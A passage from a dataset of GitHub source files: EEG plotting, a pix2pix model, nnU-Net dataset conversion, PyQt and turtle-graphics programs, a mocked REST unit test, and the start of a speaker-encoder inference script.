x >= 0 else f'{x:.0f}'\n return f'{formatted_number:>{max_width}}'\n\nclass AnnotationPlot(FigureCanvasQTAgg):\n def __init__(self, parent=None, width=10, height=4, dpi=100, hfo_app=None):\n fig,self.axs = plt.subplots(3,1,figsize=(width, height), dpi=dpi)\n super(AnnotationPlot, self).__init__(fig)\n self.hfo_app = hfo_app\n FigureCanvasQTAgg.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n FigureCanvasQTAgg.updateGeometry(self)\n # self.setParent(parent)\n # self.plot()\n\n def plot(self,start_index: int = None, end_index: int = None, channel:str = None):\n #first clear the plot\n for ax in self.axs:\n ax.cla()\n # check that the indices are in a valid range before plotting\n if start_index is None or end_index is None:\n return\n if start_index < 0 or end_index < 0:\n return\n\n channel_name = channel\n # print(\"this is channel: \", channel)\n # print(\"this is channel_name: \", channel_name)\n \n #both sets of data (filtered/unfiltered) for plots\n length = self.hfo_app.get_eeg_data_shape()[1]\n fs = self.hfo_app.sample_freq\n window_start_index, window_end_index, relative_start_index, relative_end_end = calcuate_boundary(start_index, end_index, length,fs)\n unfiltered_eeg_data, self.channel_names = self.hfo_app.get_eeg_data(window_start_index, window_end_index)\n filtered_eeg_data,_ = self.hfo_app.get_eeg_data(window_start_index, window_end_index, filtered=True)\n\n unfiltered_eeg_data_to_display_one = unfiltered_eeg_data[self.channel_names == channel_name,:][0]\n filtered_eeg_data_to_display = filtered_eeg_data[self.channel_names == channel_name,:][0]\n # print(\"window_start_index: \", window_start_index)\n # print(\"window_end_index: \", window_end_index)\n # print(\"relative_start_index: \", relative_start_index)\n # print(\"relative_end_end: \", relative_end_end)\n time_to_display = np.arange(0, unfiltered_eeg_data_to_display_one.shape[0])/fs+window_start_index/fs\n # print(\"this is time to display: \", time_to_display.shape)\n # print(\"this is unfiltered_eeg_data_to_display_one: \", unfiltered_eeg_data_to_display_one.shape)\n # print(\"this is filtered_eeg_data_to_display: \", filtered_eeg_data_to_display.shape)\n self.axs[0].set_title(\"EEG Tracing\")\n self.axs[0].plot(time_to_display, unfiltered_eeg_data_to_display_one, color='blue')\n self.axs[0].plot(time_to_display[relative_start_index:relative_end_end], unfiltered_eeg_data_to_display_one[relative_start_index:relative_end_end], color='orange')\n self.axs[0].set_xticks([])\n # keep the y axis label fixed (not moving when the plot is updated)\n \n self.axs[0].set_ylabel('Amplitude (uV)', rotation=90, labelpad=5)\n self.axs[0].yaxis.set_major_formatter(ticker.FuncFormatter(custom_formatter))\n #self.axs[0].yaxis.set_label_coords(-0.1, 0.5) \n # set the y axis label to the right side\n self.axs[0].yaxis.set_label_position(\"right\")\n #self.axs[0].grid()\n # print(\"this is time to display: \", time_to_display.shape)\n # print(\"this is filtered_eeg_data_to_display: \", filtered_eeg_data_to_display.shape)\n self.axs[1].set_title(\"Filtered Tracing\")\n self.axs[1].plot(time_to_display, filtered_eeg_data_to_display, color='blue')\n self.axs[1].plot(time_to_display[relative_start_index:relative_end_end], filtered_eeg_data_to_display[relative_start_index:relative_end_end], color='orange')\n self.axs[1].set_ylabel('Amplitude (uV)', rotation=90, labelpad=6)\n self.axs[1].set_xticks([])\n self.axs[1].yaxis.set_major_formatter(ticker.FuncFormatter(custom_formatter))\n #self.axs[1].yaxis.set_label_coords(-0.1, 0.5) \n # set the y axis label to the right side\n self.axs[1].yaxis.set_label_position(\"right\")\n #self.axs[1].grid()\n\n time_frequency = calculate_time_frequency(unfiltered_eeg_data_to_display_one,fs)\n self.axs[2].set_title(\"Time Frequency\")\n self.axs[2].imshow(time_frequency,extent=[time_to_display[0], time_to_display[-1], 10, 500], aspect='auto', cmap='jet')\n # set xticks as time\n self.axs[2].set_xticks(np.linspace(time_to_display[0], time_to_display[-1], 5))\n self.axs[2].set_xticklabels(np.round(np.linspace(time_to_display[0], time_to_display[-1], 5),1))\n # set yticks as frequency\n self.axs[2].set_yticks(np.linspace(10, 500, 5).astype(int))\n 
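        # Editor's note: the fixed-width custom_formatter defined at the top of
        # this file is reused on every panel's y-axis so tick labels occupy the
        # same width and the three stacked plots stay horizontally aligned.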
self.axs[2].yaxis.set_major_formatter(ticker.FuncFormatter(custom_formatter))\n self.axs[2].set_xlabel('Time (s)')\n self.axs[2].set_ylabel('Frequency (Hz)', rotation=90, labelpad=4)\n #self.axs[2].yaxis.set_label_coords(-0.1, 0.5) \n # set the y axis label to the right side\n self.axs[2].yaxis.set_label_position(\"right\")\n \n\n #share x axis\n #self.axs[0].sharex(self.axs[1])\n # self.axs[0].sharex(self.axs[2])\n #self.axs[1].sharex(self.axs[2])\n #call the draw function\n plt.tight_layout()\n self.draw()\n \nclass FFTPlot(FigureCanvasQTAgg):\n def __init__(self, parent=None, width=5, height=4, dpi=100, hfo_app=None):\n fig,self.axs = plt.subplots(1,1,figsize=(width, height), dpi=dpi)\n super(FFTPlot, self).__init__(fig)\n self.hfo_app = hfo_app\n \n FigureCanvasQTAgg.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n FigureCanvasQTAgg.updateGeometry(self)\n \n def plot(self,start_index: int = None, end_index: int = None, channel:str = None):\n self.axs.cla()\n start_index = int(start_index)\n end_index = int(end_index)\n unfiltered_eeg_data, channel_names = self.hfo_app.get_eeg_data(start_index, end_index)\n unfiltered_eeg_data = unfiltered_eeg_data[channel_names == channel,:][0]\n # filtered_eeg_data,_ = self.hfo_app.get_eeg_data(start_index, end_index, filtered=True)\n #compute the fft\n fs = self.hfo_app.sample_freq\n\n f, Pxx_den = signal.periodogram(unfiltered_eeg_data, fs)\n # greater than 10 Hz\n f_plot = f\n Pxx_den_plot = Pxx_den\n self.axs.semilogy(f_plot, Pxx_den_plot)\n self.axs.set_xlabel('Frequency (Hz)')\n self.axs.set_ylabel(r\"PSD (V$^2$/Hz)\")\n self.axs.set_ylim([1e-7, 1e3])\n self.axs.set_xlim([0, 500])\n self.axs.grid()\n plt.tight_layout()\n self.draw()\n \n \n \n \n \n \n\n \n","repo_name":"roychowdhuryresearch/pyHFO","sub_path":"src/ui/annotation_plot.py","file_name":"annotation_plot.py","file_ext":"py","file_size_in_byte":8647,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"12088224513","text":"import torch\nimport models.networks as networks\nimport util.util as util\n\n\nclass Pix2PixModel(torch.nn.Module):\n @staticmethod\n def modify_commandline_options(parser, is_train):\n networks.modify_commandline_options(parser, is_train)\n return parser\n\n def __init__(self, opt):\n super().__init__()\n self.opt = opt\n self.FloatTensor = torch.cuda.FloatTensor if self.use_gpu() else torch.FloatTensor\n self.ByteTensor = torch.cuda.ByteTensor if self.use_gpu() else torch.ByteTensor\n\n self.netG, self.netD, self.netE = self.initialize_networks(opt)\n\n # set loss functions\n if opt.isTrain:\n self.criterionGAN = networks.GANLoss(opt.gan_mode, tensor=self.FloatTensor, opt=self.opt)\n self.criterionFeat = torch.nn.L1Loss()\n if not opt.no_vgg_loss:\n self.criterionVGG = networks.VGGLoss(self.opt.gpu_ids)\n if opt.use_vae:\n self.KLDLoss = networks.KLDLoss()\n\n # Entry point for all calls involving forward pass\n # of deep networks. 
We used this approach since DataParallel module\n # can't parallelize custom functions, we branch to different\n # routines based on |mode|.\n def forward(self, data, mode):\n input_semantics, real_image, degraded_image = self.preprocess_input(data)\n\n if mode == \"generator\":\n g_loss, generated = self.compute_generator_loss(input_semantics, degraded_image, real_image)\n return g_loss, generated\n elif mode == \"discriminator\":\n d_loss = self.compute_discriminator_loss(input_semantics, degraded_image, real_image)\n return d_loss\n elif mode == \"encode_only\":\n z, mu, logvar = self.encode_z(real_image)\n return mu, logvar\n elif mode == \"inference\":\n with torch.no_grad():\n fake_image, _ = self.generate_fake(input_semantics, degraded_image, real_image)\n return fake_image\n else:\n raise ValueError(\"|mode| is invalid\")\n\n def create_optimizers(self, opt):\n G_params = list(self.netG.parameters())\n if opt.use_vae:\n G_params += list(self.netE.parameters())\n if opt.isTrain:\n D_params = list(self.netD.parameters())\n\n beta1, beta2 = opt.beta1, opt.beta2\n if opt.no_TTUR:\n G_lr, D_lr = opt.lr, opt.lr\n else:\n G_lr, D_lr = opt.lr / 2, opt.lr * 2\n\n optimizer_G = torch.optim.Adam(G_params, lr=G_lr, betas=(beta1, beta2))\n optimizer_D = torch.optim.Adam(D_params, lr=D_lr, betas=(beta1, beta2))\n\n return optimizer_G, optimizer_D\n\n def save(self, epoch):\n util.save_network(self.netG, \"G\", epoch, self.opt)\n util.save_network(self.netD, \"D\", epoch, self.opt)\n if self.opt.use_vae:\n util.save_network(self.netE, \"E\", epoch, self.opt)\n\n ############################################################################\n # Private helper methods\n ############################################################################\n\n def initialize_networks(self, opt):\n netG = networks.define_G(opt)\n netD = networks.define_D(opt) if opt.isTrain else None\n netE = networks.define_E(opt) if opt.use_vae else None\n\n if not opt.isTrain or opt.continue_train:\n netG = util.load_network(netG, \"G\", opt.which_epoch, opt)\n if opt.isTrain:\n netD = util.load_network(netD, \"D\", opt.which_epoch, opt)\n if opt.use_vae:\n netE = util.load_network(netE, \"E\", opt.which_epoch, opt)\n\n return netG, netD, netE\n\n # preprocess the input, such as moving the tensors to GPUs and\n # transforming the label map to one-hot encoding\n # |data|: dictionary of the input data\n\n def preprocess_input(self, data):\n # move to GPU and change data types\n # data['label'] = data['label'].long()\n\n if not self.opt.isTrain:\n if self.use_gpu():\n data[\"label\"] = data[\"label\"].cuda()\n data[\"image\"] = data[\"image\"].cuda()\n return data[\"label\"], data[\"image\"], data[\"image\"]\n\n ## While testing, the input image is the degraded face\n if self.use_gpu():\n data[\"label\"] = data[\"label\"].cuda()\n data[\"degraded_image\"] = data[\"degraded_image\"].cuda()\n data[\"image\"] = data[\"image\"].cuda()\n\n # # create one-hot label map\n # label_map = data['label']\n # bs, _, h, w = label_map.size()\n # nc = self.opt.label_nc + 1 if self.opt.contain_dontcare_label \\\n # else self.opt.label_nc\n # input_label = self.FloatTensor(bs, nc, h, w).zero_()\n # input_semantics = input_label.scatter_(1, label_map, 1.0)\n\n return data[\"label\"], data[\"image\"], data[\"degraded_image\"]\n\n def compute_generator_loss(self, input_semantics, degraded_image, real_image):\n G_losses = {}\n\n fake_image, KLD_loss = self.generate_fake(\n input_semantics, degraded_image, real_image, 
compute_kld_loss=self.opt.use_vae\n )\n\n if self.opt.use_vae:\n G_losses[\"KLD\"] = KLD_loss\n\n pred_fake, pred_real = self.discriminate(input_semantics, fake_image, real_image)\n\n G_losses[\"GAN\"] = self.criterionGAN(pred_fake, True, for_discriminator=False)\n\n if not self.opt.no_ganFeat_loss:\n num_D = len(pred_fake)\n GAN_Feat_loss = self.FloatTensor(1).fill_(0)\n for i in range(num_D): # for each discriminator\n # last output is the final prediction, so we exclude it\n num_intermediate_outputs = len(pred_fake[i]) - 1\n for j in range(num_intermediate_outputs): # for each layer output\n unweighted_loss = self.criterionFeat(pred_fake[i][j], pred_real[i][j].detach())\n GAN_Feat_loss += unweighted_loss * self.opt.lambda_feat / num_D\n G_losses[\"GAN_Feat\"] = GAN_Feat_loss\n\n if not self.opt.no_vgg_loss:\n G_losses[\"VGG\"] = self.criterionVGG(fake_image, real_image) * self.opt.lambda_vgg\n\n return G_losses, fake_image\n\n def compute_discriminator_loss(self, input_semantics, degraded_image, real_image):\n D_losses = {}\n with torch.no_grad():\n fake_image, _ = self.generate_fake(input_semantics, degraded_image, real_image)\n fake_image = fake_image.detach()\n fake_image.requires_grad_()\n\n pred_fake, pred_real = self.discriminate(input_semantics, fake_image, real_image)\n\n D_losses[\"D_Fake\"] = self.criterionGAN(pred_fake, False, for_discriminator=True)\n D_losses[\"D_real\"] = self.criterionGAN(pred_real, True, for_discriminator=True)\n\n return D_losses\n\n def encode_z(self, real_image):\n mu, logvar = self.netE(real_image)\n z = self.reparameterize(mu, logvar)\n return z, mu, logvar\n\n def generate_fake(self, input_semantics, degraded_image, real_image, compute_kld_loss=False):\n z = None\n KLD_loss = None\n if self.opt.use_vae:\n z, mu, logvar = self.encode_z(real_image)\n if compute_kld_loss:\n KLD_loss = self.KLDLoss(mu, logvar) * self.opt.lambda_kld\n\n fake_image = self.netG(input_semantics, degraded_image, z=z)\n\n assert (\n not compute_kld_loss\n ) or self.opt.use_vae, \"You cannot compute KLD loss if opt.use_vae == False\"\n\n return fake_image, KLD_loss\n\n # Given fake and real image, return the prediction of discriminator\n # for each fake and real image.\n\n def discriminate(self, input_semantics, fake_image, real_image):\n\n if self.opt.no_parsing_map:\n fake_concat = fake_image\n real_concat = real_image\n else:\n fake_concat = torch.cat([input_semantics, fake_image], dim=1)\n real_concat = torch.cat([input_semantics, real_image], dim=1)\n\n # In Batch Normalization, the fake and real images are\n # recommended to be in the same batch to avoid disparate\n # statistics in fake and real images.\n # So both fake and real images are fed to D all at once.\n fake_and_real = torch.cat([fake_concat, real_concat], dim=0)\n\n discriminator_out = self.netD(fake_and_real)\n\n pred_fake, pred_real = self.divide_pred(discriminator_out)\n\n return pred_fake, pred_real\n\n # Take the prediction of fake and real images from the combined batch\n def divide_pred(self, pred):\n # the prediction contains the intermediate outputs of multiscale GAN,\n # so it's usually a list\n if type(pred) == list:\n fake = []\n real = []\n for p in pred:\n fake.append([tensor[: tensor.size(0) // 2] for tensor in p])\n real.append([tensor[tensor.size(0) // 2 :] for tensor in p])\n else:\n fake = pred[: pred.size(0) // 2]\n real = pred[pred.size(0) // 2 :]\n\n return fake, real\n\n def get_edges(self, t):\n edge = self.ByteTensor(t.size()).zero_()\n edge[:, :, :, 1:] = edge[:, :, :, 1:] | (t[:, :, 
:, 1:] != t[:, :, :, :-1])\n edge[:, :, :, :-1] = edge[:, :, :, :-1] | (t[:, :, :, 1:] != t[:, :, :, :-1])\n edge[:, :, 1:, :] = edge[:, :, 1:, :] | (t[:, :, 1:, :] != t[:, :, :-1, :])\n edge[:, :, :-1, :] = edge[:, :, :-1, :] | (t[:, :, 1:, :] != t[:, :, :-1, :])\n return edge.float()\n\n def reparameterize(self, mu, logvar):\n std = torch.exp(0.5 * logvar)\n eps = torch.randn_like(std)\n return eps.mul(std) + mu\n\n def use_gpu(self):\n return len(self.opt.gpu_ids) > 0\n","repo_name":"microsoft/Bringing-Old-Photos-Back-to-Life","sub_path":"Face_Enhancement/models/pix2pix_model.py","file_name":"pix2pix_model.py","file_ext":"py","file_size_in_byte":9712,"program_lang":"python","lang":"en","doc_type":"code","stars":13933,"dataset":"github-code","pt":"77"} +{"seq_id":"23977914263","text":"# -*- Mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8; -*-\ntop = '../..'\n\ndef build(bld):\n\n bld.objects(\n target='ndn2peek-objects',\n source=bld.path.ant_glob('ndn2peek/*.cpp', excl='ndn2peek/main.cpp'),\n use='core-objects')\n\n bld.program(\n target='../../bin/vectorchat',\n source='simplechat.cpp',\n use=['core-objects', 'ndn2peek-objects'])\n\n","repo_name":"simzou/vector-chat","sub_path":"tools/simple-vector-chat/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21324040852","text":"from collections import OrderedDict\nfrom nnunet.paths import nnUNet_raw_data\nfrom batchgenerators.utilities.file_and_folder_operations import *\nimport shutil\n\n\nif __name__ == \"__main__\":\n #i used the CervixRawData.zip\n base = \"/home/constantin/Downloads/CervixRawData/RawData\"\n\n task_id = 18\n task_name = \"PelvicOrganSegmentation\"\n prefix = 'ABD'\n\n foldername = \"Task%03.0d_%s\" % (task_id, task_name)\n\n out_base = join(nnUNet_raw_data, foldername)\n imagestr = join(out_base, \"imagesTr\")\n imagests = join(out_base, \"imagesTs\")\n labelstr = join(out_base, \"labelsTr\")\n maybe_mkdir_p(imagestr)\n maybe_mkdir_p(imagests)\n maybe_mkdir_p(labelstr)\n\n train_folder = join(base, \"Training/img\")\n label_folder = join(base, \"Training/label\")\n test_folder = join(base, \"Testing/img\")\n train_patient_names = []\n test_patient_names = []\n train_patients = subfiles(train_folder, join=False, suffix = 'nii.gz')\n for p in train_patients:\n train_patient_name = p\n label_file = join(label_folder, p[:-13] + '-Mask.nii.gz')\n image_file = join(train_folder, p)\n shutil.copy(image_file, join(imagestr, p[:-7]+'_0000.nii.gz'))\n shutil.copy(label_file, join(labelstr, train_patient_name))\n train_patient_names.append(train_patient_name)\n\n test_patients = subfiles(test_folder, join=False, suffix=\".nii.gz\")\n for p in test_patients:\n test_patient_name = p\n image_file = join(test_folder, p)\n shutil.copy(image_file, join(imagests, p[:-7] + '_0000.nii.gz'))\n test_patient_names.append(test_patient_name)\n\n json_dict = OrderedDict()\n json_dict['name'] = \"PelvicOrganSegmentation\"\n json_dict['description'] = \"Multi-Atlas Labeling Beyond the Cranial Vault Abdominal Organ Segmentation\"\n json_dict['tensorImageSize'] = \"3D\"\n json_dict['reference'] = \"https://www.synapse.org/#!Synapse:syn3193805/wiki/217789\"\n json_dict['licence'] = \"see challenge website\"\n json_dict['release'] = \"0.0\"\n json_dict['modality'] = {\n \"0\": \"CT\",\n }\n json_dict['labels'] = OrderedDict({\n \"00\": \"background\",\n \"01\": \"bladder\",\n \"02\": \"uterus\",\n 
\"03\": \"rectum\",\n \"04\": \"small bowel\",}\n )\n json_dict['numTraining'] = len(train_patient_names)\n json_dict['numTest'] = len(test_patient_names)\n json_dict['training'] = [{'image': \"./imagesTr/%s\" % train_patient_name, \"label\": \"./labelsTr/%s\" % train_patient_name} for i, train_patient_name in enumerate(train_patient_names)]\n json_dict['test'] = [\"./imagesTs/%s\" % test_patient_name for test_patient_name in test_patient_names]\n\n save_json(json_dict, os.path.join(out_base, \"dataset.json\"))","repo_name":"MIC-DKFZ/MultiTalent","sub_path":"nnunet/dataset_conversion/Task018_PelvicOrganSegmentation.py","file_name":"Task018_PelvicOrganSegmentation.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"77"} +{"seq_id":"39203774139","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys, time, os\nfrom PyQt4 import QtGui, QtCore\n\n# Compiled ui classes\nfrom adminUi import Ui_AdminWindow\n\n# Admin Item Window\nfrom adminItemWindow import *\n\n# Admin Statistics Window\nfrom adminStatsWindow import *\n\nclass AdminWindow(QtGui.QDialog):\n def __init__(self, parent=None):\n QtGui.QDialog.__init__(self, parent, QtCore.Qt.Window)\n self.ui=Ui_AdminWindow()\n self.ui.setupUi(self)\n self.setModal(True)\n self.adminItemWindow = AdminItemWindow(self)\n self.adminStatsWindow = AdminStatsWindow(self)\n self.ui.pushBack.clicked.connect(self.pushBack)\n self.ui.pushAdmin.clicked.connect(self.pushAdmin)\n self.ui.pushStats.clicked.connect(self.pushStats)\n\n def show(self):\n QtGui.QDialog.show(self)\n self.setWindowState(QtCore.Qt.Fullscreen)\n\n def close(self):\n self.adminItemWindow.close()\n self.adminStatsWindow.close()\n QtGui.QDialog.close(self)\n\n def pushBack(self):\n self.reject()\n\n def pushAdmin(self):\n self.adminItemWindow.exec_()\n self.raise_()\n self.activateWindow()\n\n def pushStats(self):\n # Workaround for Qt bug in AdminStatsWindow - QFormLayouts can not be reset properly\n self.adminStatsWindow.deleteLater()\n self.adminStatsWindow.close()\n self.adminStatsWindow = AdminStatsWindow(self)\n self.adminStatsWindow.exec_()\n self.raise_()\n self.activateWindow()\n","repo_name":"fsiwi-hka/coffeesale","sub_path":"adminWindow.py","file_name":"adminWindow.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"6756768253","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 06/11/18\n\n@author: Maurizio Ferrari Dacrema\n\"\"\"\n\n\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\nimport itertools, os\n\n\ndef plot_algs_at_different_cutoffs(evaluator, folder_path,\n recommender1_object, recommender1_name,\n recommender_dict_name_to_object):\n\n \"\"\"\n\n :param evaluator:\n :param cutoff_list:\n :param folder_path:\n :param recommender_dict_name_to_object: Contains a dictionary [alg_lable]-> recommender_object\n :return:\n \"\"\"\n\n # If directory does not exist, create\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n\n\n\n assert recommender1_name not in recommender_dict_name_to_object, \"This function requires the recommender1_name NOT to be in recommender_dict_name_to_object\"\n\n recommender_dict_name_to_object[recommender1_name] = recommender1_object\n\n\n recommender_dict_name_to_result_dict = {}\n metric_list = None\n cutoff_list = None\n\n\n for recommender_name in 
recommender_dict_name_to_object.keys():\n\n recommender_object = recommender_dict_name_to_object[recommender_name]\n\n results_dict, results_dict_string = evaluator.evaluateRecommender(recommender_object)\n\n logFile = open(folder_path + recommender_name + \"_all_cutoffs.txt\", \"a\")\n logFile.write(results_dict_string)\n logFile.close()\n\n print(\"Results for {}: \\n{}\".format(recommender_name, results_dict_string))\n\n recommender_dict_name_to_result_dict[recommender_name] = results_dict\n\n if metric_list is None:\n cutoff_list = list(results_dict.keys())\n metric_list = list(results_dict[cutoff_list[0]].keys())\n\n\n\n\n\n\n import pickle\n\n pickle.dump(recommender_dict_name_to_result_dict,\n open(folder_path + \"recommender_dict_name_to_result_dict\", \"wb\"),\n protocol=pickle.HIGHEST_PROTOCOL)\n\n\n\n\n for recommender2_name in recommender_dict_name_to_object.keys():\n\n if recommender2_name == recommender1_name:\n continue\n\n results_dict_recommender1 = recommender_dict_name_to_result_dict[recommender1_name]\n results_dict_recommender2 = recommender_dict_name_to_result_dict[recommender2_name]\n\n\n for metric_to_plot in metric_list:\n\n results_dict_recommender1_x_values = [results_dict_recommender1[cutoff][metric_to_plot] for cutoff in cutoff_list]\n results_dict_recommender2_x_values = [results_dict_recommender2[cutoff][metric_to_plot] for cutoff in cutoff_list]\n\n\n\n # Turn interactive plotting off\n plt.ioff()\n\n # Ensure it works even on SSH\n plt.switch_backend('agg')\n\n plt.xlabel('Cutoff value')\n plt.ylabel(\"{} value\".format(metric_to_plot))\n plt.title(\"Metric value for different cutoff values\")\n\n x_tick = cutoff_list\n\n marker_list = [\".\", \",\", \"o\", \"v\", \"^\", \"<\", \">\", \"1\", \"2\", \"3\", \"4\", \"8\", \"s\", \"p\", \"P\", \"*\", \"h\", \"H\", \"+\", \"x\", \"X\", \"D\", \"d\"]\n marker_iterator_local = itertools.cycle(marker_list)\n\n\n plt.plot(x_tick, results_dict_recommender1_x_values, linewidth=3, label = recommender1_name,\n linestyle = \"-\", marker = marker_iterator_local.__next__())\n\n plt.plot(x_tick, results_dict_recommender2_x_values, linewidth=3, label = recommender2_name,\n linestyle = \"-\", marker = marker_iterator_local.__next__())\n\n plt.legend()\n\n plt.savefig(folder_path + \"Metric value for different cutoff values_{}_{}_{}\".format(recommender1_name, recommender2_name, metric_to_plot))\n\n plt.close()\n\n\n\n\n\n","repo_name":"jiajunhua/MaurizioFD-RecSys2019_DeepLearning_Evaluation","sub_path":"Utils/plot_algs_at_different_cutoffs.py","file_name":"plot_algs_at_different_cutoffs.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"9222252716","text":"from turtle import Turtle\nimport random\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n def __init__(self):\n super().__init__()\n self.all_cars = []\n self.car_speed = STARTING_MOVE_DISTANCE\n \n \n\n def create(self):\n \"\"\"Create car\n \"\"\"\n \n \n random_chance = random.randint(1,6)\n if random_chance == 1: #Create car at every time the while loop as been run 6 times\n new_car = Turtle(\"square\")\n new_car.shapesize(stretch_wid=1, stretch_len=2)\n new_car.penup()\n random_no = random.randint(0, len(COLORS)-1)\n random_ycor = random.randint(-250, 250)\n new_car.color(COLORS[random_no])\n new_car.goto(300, random_ycor)\n new_car.setheading(180)\n 
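        # heading 180 points the car to the left, so the forward() calls in
        # move_car() drive it across the screen once it is registered below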
self.all_cars.append(new_car)\n \n \n \n\n def move_car(self):\n for car in self.all_cars:\n car.forward(self.car_speed)\n \n \n def increase_speed(self):\n self.car_speed += MOVE_INCREMENT\n \n","repo_name":"wanicedude/Turtle--Crossing","sub_path":"car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21859870086","text":"import unittest\nfrom unittest.mock import patch, MagicMock\n\nfrom rest.CommonRequest import CommonRequestCall\nfrom rest.WebsiteRequest import WebsiteRequest\n\ncrawlerRest = WebsiteRequest()\ncommonRestAPi = CommonRequestCall()\n\nBASE_URL = 'https://mock-uri'\n\n\nclass CommonRestApiTestCase(unittest.TestCase):\n\n @patch('urllib.request.urlopen')\n def test_rest_happy_path(self, mock_urlopen):\n mock_ = MagicMock()\n mock_.getcode.return_value = 200\n mock_.read.return_value = 'contents'\n mock_urlopen.return_value = mock_\n request_data = crawlerRest.get_properties_of_area(BASE_URL, 'CV1', 2)\n self.assertEqual(request_data, \"contents\")\n\n @patch('urllib.request.urlopen')\n def test_rest_handle_500_exception(self, mock_urlopen):\n mock_ = MagicMock()\n mock_.getcode.return_value = 500\n mock_.read.return_value = 'unavailable'\n mock_urlopen.return_value = mock_\n request_data = crawlerRest.get_properties_of_area(BASE_URL, 'CV1', 2)\n self.assertEqual(request_data, \"unavailable\")\n","repo_name":"manra399/scraper_temp","sub_path":"unit_tests/rest/crawler_rest_test_case.py","file_name":"crawler_rest_test_case.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"682966182","text":"import cv2\nimport numpy as np\n\nfrom os import listdir\nfrom os.path import isdir, isfile, join\n\n\nclass DataProcessor:\n\n @staticmethod\n def read_image_data(foldername, test_dataset=False):\n frames_dict = {}\n internal_folders = [f for f in listdir(foldername) if isdir(join(foldername, f))]\n count = 0\n for internal_folder in internal_folders:\n frames_files = [f for f in listdir(join(foldername, internal_folder)) if\n isfile(join(foldername, join(internal_folder, f)))]\n image_list = []\n for frame in frames_files:\n file = join(foldername, join(internal_folder, frame))\n image_list.append(np.asarray(cv2.imread(file, 0)))\n frames_dict[internal_folder] = image_list\n\n count += 1\n\n if test_dataset:\n if count > 3:\n break\n\n return frames_dict\n\n @staticmethod\n def reshape_dataset(input_data, size):\n\n reshaped_data = []\n for row in [en_img.reshape(size[0], size[1]) for en_img in input_data]:\n reshaped_data.append(row[0])\n\n return reshaped_data\n\n @staticmethod\n def convert_to_model_dataformat(frames_dict, train_test):\n\n data = []\n data_label = []\n for key, image_array in frames_dict.items():\n data.extend(image_array)\n data_label.extend([str(train_test) + '_' + str(key) + '_' + str(idx + 1) for idx, val in\n enumerate(range(len(image_array)))])\n\n return np.asarray(data), data_label\n\n","repo_name":"razmik/visual-feature-extractors","sub_path":"computer-vision-domain/handcrafted/util/data_processor.py","file_name":"data_processor.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"37877854315","text":"\nfrom encoder.params_model import model_embedding_size as speaker_embedding_size\nfrom 
utils.argutils import print_args\nfrom synthesizer.inference import Synthesizer\nfrom encoder import inference as encoder\nfrom encoder import audio\nfrom vocoder import inference as vocoder\nimport numpy as np\nimport torch\nimport librosa\nfrom utils.sigproc import *\nimport torchvision.transforms as transforms\nfrom pathlib import Path\nimport demo_config as config\nimport re\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu_id\n\ndef fCNN_encoder(file_path, model_save_path, sampling_rate=8000, n_channels=1, duration = None, is_cmvn = False, normalize=True,):\n # Load the model from model_save_path\n from encoder.models import OneD_Triplet_fCNN as network\n model = network.cnn()\n model = torch.nn.DataParallel(model).cuda()\n checkpoint = torch.load(model_save_path)\n model.load_state_dict(checkpoint['state_dict'])\n model.eval()\n\n # Load audio from file_path\n win = np.hamming(int(sampling_rate*0.02))\n frame = get_frame_from_file(file_path, win=win, sr=sampling_rate, n_channels=n_channels, duration = duration, is_cmvn=is_cmvn)\n data = np.expand_dims(frame, axis=2)\n transform = transforms.Compose([transforms.ToTensor()])\n data = transform(data)\n data = data.unsqueeze(0)\n data = data.float()\n\n ## Evaluate the audio using the model\n x1, _ = model(data)\n x1_d = x1.data.cpu().float().numpy().flatten()\n embed_input = np.concatenate((x1_d, x1_d), axis=0)\n\n embed = embed_input\n if(normalize):\n embed = embed_input / np.linalg.norm(embed_input)\n\n return embed\n\n\n\n\n\ndef OneD_Triplet_CNN_encoder(file_path, model_save_path, ftr_type = 'MFCC-LPC', sampling_rate=16000, n_channels=1, duration = 2.01, normalize=True,):\n # Load the model from model_save_path\n from encoder.models import OneD_Triplet_fCNN as network\n model = network.cnn()\n model = torch.nn.DataParallel(model).cuda()\n checkpoint = torch.load(model_save_path)\n model.load_state_dict(checkpoint['state_dict'])\n model.eval()\n\n # Load audio from file_path\n win = np.hamming(int(sampling_rate*0.02))\n inc = int(win.shape[0]/2)\n input_audio, sr = librosa.load(file_path, sr=sampling_rate)\n order = 20\n preemphasis = True\n includeDerivatives = True\n if ftr_type == 'MFCC-LPC':\n frame = get_mfcc_lpc_feature(input_audio, sampling_rate, order = order, preemphasis = preemphasis, includeDerivatives = includeDerivatives, win = win, inc = inc)\n data = frame\n transform = transforms.Compose([transforms.ToTensor()])\n data = transform(data)\n data = data.unsqueeze(0)\n data = 